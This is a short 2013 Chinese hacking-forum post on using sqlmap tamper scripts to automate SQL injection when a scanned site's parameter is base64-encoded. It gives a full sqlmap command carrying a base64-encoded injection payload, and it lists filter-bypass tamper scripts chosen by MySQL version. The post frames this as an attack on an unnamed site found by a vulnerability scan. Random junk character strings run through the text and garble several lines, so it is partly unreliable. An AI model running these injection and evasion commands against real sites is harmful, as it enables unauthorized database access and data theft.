找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2357|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?+ z: V( F4 z, k! v% ]: K  b" U- p& {
5 f. l& U0 b6 V, y4 \9 d
sqlmap的tamper里有个base64encode.py
) H9 k6 r1 O: i7 i2 g8 W- z) x
! o+ Y) {5 A0 [$ M$ s# [% J使用如下4 t# q) y( H1 J" k7 ~5 q' B
0 p5 ~; q  a0 a  @, l! S" Y1 Z
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs# Z3 G6 y. q% T6 p0 U' H

# @6 {0 o, b4 b( v
5 Z0 e0 r+ R: {* R* V) J, ^sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
' F6 `8 Y" Z$ ~' O8 X( j. N; A% ^( b+ L1 l4 W% I  z9 i3 b: f" a
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:, P2 C8 m2 K+ D% p
+ e. P( `! X# J6 j$ {- I4 W1 V
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
. d3 O/ I3 d  m3 Y+ S- K6 W' rspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入9 ^, P* V, }# m7 D! [
首先确定目标数据库版本,然后选择相应的脚本。9 y9 [* m9 K. y8 W- C- }, W% K
-v 3 --batch --tamper "space2hash.py"' l# m8 |0 d9 M" ^" Y
- n1 }+ M  t5 R
还有其他一些插件:
6 x3 ]' |0 r' pencodes编码 ——charencode.py/ K8 Q* }% j( t  E, x: r
base64编码 —— base64encode.py( i* h; H1 R$ R% A
替换空格和关键字 —— halfversionedmorekeywords.py
) J4 r/ q6 B5 P+ n) k7 c/ k

: o& {& @- r# C! b8 L; J8 ~  p) b) W$ D' |9 `6 ~

$ R4 m4 G9 v/ o+ j) M' v. A' H" k
( X$ D* C4 E/ o: ]$ f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表